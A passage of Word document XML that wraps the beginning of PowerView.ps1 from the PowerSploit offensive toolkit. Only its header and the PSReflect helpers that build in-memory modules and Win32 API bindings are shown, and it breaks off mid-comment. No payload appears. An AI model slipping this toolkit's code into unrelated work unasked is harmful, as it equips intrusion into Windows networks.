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DAB2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#requires -version 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2CC919" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="432B7F33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BBAD6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18F93000" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    PowerSploit File: PowerView.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB33E27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Author: Will Schroeder (@harmj0y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396422F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519DBABD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Required Dependencies: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11C52B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Optional Dependencies: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C5DAA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38626FA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3361D626" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B61350A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C942D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0D707F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># PSReflect code for Windows API access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A16C37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># Author: @mattifestation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC136AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#   https://raw.githubusercontent.com/mattifestation/PSReflect/master/PSReflect.psm1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B4345" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22307F4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39900FD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="66BBF89A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function New-InMemoryModule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543D1BD0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4760DBAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D8188B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22327C24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05D13D49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Creates an in-memory assembly and module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4728C295" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="01BD964A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: Matthew Graeber (@mattifestation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613B4549" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DDE866" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Required Dependencies: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11296A99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Optional Dependencies: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB2561" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6405E41C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510CF956" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79C6390C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        When defining custom enums, structs, and unmanaged functions, it is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44877546" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        necessary to associate to an assembly module. This helper function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAAD845" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        creates an in-memory module that can be passed to the 'enum',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0437A0BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'struct', and Add-Win32Type functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651E4C0C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="56585CF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ModuleName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F2A208" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="753ED8E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Specifies the desired name for the in-memory assembly and module. If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071336FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ModuleName is not provided, it will default to a GUID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07313625" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05F6DFB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF05041" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2043CE58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Module = New-InMemoryModule -ModuleName Win32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644FBBD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E617F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53318DE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1CF151" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04627E94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 0)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519EB88D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511AC952" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA2F4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ModuleName = [Guid]::NewGuid().ToString()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE54EA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A07208D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E78B0CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $LoadedAssemblies = [AppDomain]::CurrentDomain.GetAssemblies()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672320FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="49B510BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    ForEach ($Assembly in $LoadedAssemblies) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424F9DB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03624FC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            return $Assembly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B0DAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7068D999" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170B97F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C88FACD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DynAssembly = New-Object Reflection.AssemblyName($ModuleName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0A7720" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Domain = [AppDomain]::CurrentDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4288ADBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107DFE76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C979D54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F7B7CA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    return $ModuleBuilder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F69E40A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E37A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="558A3B1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="330AB6E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># A helper function used to reduce typing while defining function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D16AC6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># prototypes for Add-Win32Type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E1D7DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function func</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58234CAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4120F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269ADD08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1E36F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 0, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082EE737" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A68E1C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DllName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA5CFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="46BE63F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 1, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110E3049" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F186A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FunctionName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233887AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AB9EAA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 2, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596B538B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Type]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570DDA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ReturnType,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F4278F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="129E7544" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 3)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64055CC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Type[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC575DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ParameterTypes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E47A03C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1CDB0ECB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 4)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD331ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Runtime.InteropServices.CallingConvention]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332F2312" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NativeCallingConvention,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32613871" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="56BF04CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 5)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7927ACFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Runtime.InteropServices.CharSet]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022496E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Charset,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD842A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="11842936" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162DC0F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SetLastError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74501D4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4080991E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="207EE9D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Properties = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDDC40F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        DllName = $DllName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B73CF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        FunctionName = $FunctionName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA3DBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ReturnType = $ReturnType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0FB1D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082541D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="185BC7AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1407E0E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4C12CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if ($Charset) { $Properties['Charset'] = $Charset }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7A193E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($SetLastError) { $Properties['SetLastError'] = $SetLastError }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79272009" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D04E22B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    New-Object PSObject -Property $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6570D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A71DF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="233513DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="46474F7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Add-Win32Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C13837" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67966C98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D10286" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5A9975" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57BE01FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Creates a .NET type for an unmanaged Win32 function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5EEA47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="674E7571" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: Matthew Graeber (@mattifestation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC4D1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35271BF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Required Dependencies: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3867AE30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Optional Dependencies: func</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9245C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="128B8AB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E550A37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F7585E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Add-Win32Type enables you to easily interact with unmanaged (i.e.</w:t>
      </w:r>
    </w:p>
